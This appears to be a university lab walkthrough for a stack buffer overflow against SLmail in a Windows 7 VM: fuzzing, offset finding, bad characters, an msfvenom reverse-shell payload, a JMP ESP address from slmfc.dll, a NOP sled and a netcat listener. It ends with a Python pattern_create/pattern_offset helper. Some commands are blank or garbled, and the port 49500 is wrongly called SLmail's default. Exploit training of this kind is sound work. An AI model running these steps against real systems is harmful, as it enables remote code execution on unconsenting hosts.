1. **Prepare Parrot OS and Windows 7 VM:**
    - Start your UTM instance with both the Parrot OS (NAT mode) and Windows 7 VMs running.
    - Switch Parrot OS to "Host-only network" mode and note its IP address.
    - Confirm that you can ping the Windows 7 VM from Parrot OS.
2. **Download required files:**
    - Download "Scripts.zip" from Blackboard (T2, Week 2) on Parrot OS.
    - Extract the contents of "Scripts.zip" to a convenient location, e.g. `/opt/exploit-dev/scripts/`.
3. **Run SLmail and Immunity Debugger (ID):**
    - Start SLmail on the Windows 7 VM.
    - Run Immunity Debugger as an administrator. To make the font more legible, right-click on the black area > Appearance > Font > OEM.
4. **Attach SLmail to ID:**
    - In Immunity Debugger, go to `File > Attach…`, select the SLmail process, and click "Open".
    - Put the debugger into the "Running" state by clicking the "Running" button in the toolbar.
5. **Run the fuzzer:**
    - Open a terminal on Parrot OS and change to the scripts directory.
    - Run `python fuzzer.py 49500` (SLmail's default port is 49500) to start fuzzing the application.
    - The goal is to crash SLmail by sending random data.
6. **Generate a unique 4-byte pattern:**
    - Run `ruby pattern_create.rb ` with the desired length (e.g. `ruby pattern_create.rb 100`) to generate a cyclic pattern in which every 4-byte sequence occurs only once, so that the bytes landing in EIP identify their position in the buffer.
7. **Find the starting offset:**
    - Send the generated pattern to SLmail using the fuzzer and observe where it crashes. The offset is the number of bytes before the crash location.
    - Use `ruby pattern_offset.rb ` to calculate and confirm the offset.
8. **Verify the offset:**
    - Send a crafted payload that overwrites EIP at the calculated offset to confirm that the previous steps were accurate.
    - Use `python sendshell.py 49500 "" "stupid string"` to send the crafted payload.
9. **Check for space on the stack:**
    - Send approximately 800 bytes after the EIP location to verify that there is enough space for the payload.
    - Use `ruby space.rb 800` to check the available space.
10. **Find bad characters:**
    - Identify byte values that cause the application to behave unexpectedly (e.g. crash or otherwise misbehave).
    - Use `ruby badchars.rb 49500 ` to find and list bad characters.
11. **Create shellcode:**
    - Use msfvenom to create a payload (shellcode) for the appropriate architecture and privileges, excluding the bad characters identified earlier.
    - Run `msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -a x86 --bad-chars= -f raw` to generate the shellcode.
12. **Identify a DLL without memory protections:**
    - Use `!mona modules` in Immunity Debugger to list the loaded modules and identify DLLs without memory protections.
    - Our target is `slmfc.dll`.
13. **Find a JMP ESP address:**
    - Use nasm_shell to get the opcodes for JMP ESP (FF E4): run `nasm_shell > jmp esp` and it prints `FFE4`.
    - Use `!mona find -s "\xff\xe4" -m slmfc.dll` to search for the FF E4 opcodes in slmfc.dll and choose one of the addresses found (e.g. `0x5f4a358f`) as the new EIP.
14. **Prepare the exploit script:**
    - Replace the `Bs` in the exploit script (e.g. `exploit.rb`) with the address chosen earlier.
    - Add a NOP sled (e.g. `"\x90" * 16`) before the JMP ESP address to absorb slight miscalculations or fluctuations in the memory layout.
    - The exploit script should look something like this: `"\x90" * 16 + "\xff\x\xe4" + "\xbe\xxx\xxxx\xxx\xxx"`. Replace `Bs` with the chosen address.
15. **Start a netcat listener:**
    - On Parrot OS, run `nc -lvp 443` to start a netcat listener on port 443.
16. **Run the exploit:**
    - Execute the prepared exploit script with `ruby exploit.rb 49500`.
    - Once the exploit triggers, you should get a shell on the Windows 7 VM.
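Steps 6 and 7 depend on a cyclic pattern in which every 4-byte window is unique; the following Python is an added example for crash triage, not one of the lab's scripts, that builds the same `Aa0Aa1Aa2...` pattern as `pattern_create.rb` and resolves an offset the way `pattern_offset.rb` does, accepting either the four characters seen in EIP or the little-endian register value the debugger displays. Knowing whether a crash lands a controlled value in the saved return address is what separates a denial-of-service bug from a code-execution one when rating severity.

```python
import string
import struct

# Character classes used by Metasploit's pattern_create.rb. Each chunk is
# "<Upper><lower><digit>" with the digit cycling fastest, so no 4-byte window
# repeats within the first 26 * 26 * 10 * 3 = 20280 bytes.
UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits
MAX_UNIQUE = len(UPPER) * len(LOWER) * len(DIGITS) * 3


def pattern_create(length):
    """Return the first `length` characters of the Aa0Aa1Aa2... pattern."""
    if not 0 < length <= MAX_UNIQUE:
        raise ValueError(f"length must be 1..{MAX_UNIQUE}, got {length}")
    chunks = (up + lo + dg for up in UPPER for lo in LOWER for dg in DIGITS)
    return "".join(chunks)[:length]


def pattern_offset(value, length=MAX_UNIQUE):
    """Return the offset of `value` in the pattern, or -1 if it is absent.

    `value` is either the characters found in the register (e.g. "Aa3A") or
    the hex value the debugger shows (e.g. "0x41336141"). x86 is little
    endian, so a hex register value is unpacked with "<I" to recover the
    order in which those bytes appeared in the buffer.
    """
    if value.lower().startswith("0x"):
        needle = struct.pack("<I", int(value, 16)).decode("latin-1")
    else:
        needle = value
    if len(needle) < 4:
        raise ValueError("need at least 4 characters for an unambiguous match")
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_create(100))
    # Constructed register value: EIP = 0x41336141 corresponds to "Aa3A",
    # which begins 9 bytes into the pattern.
    print(pattern_offset("0x41336141", 100))
```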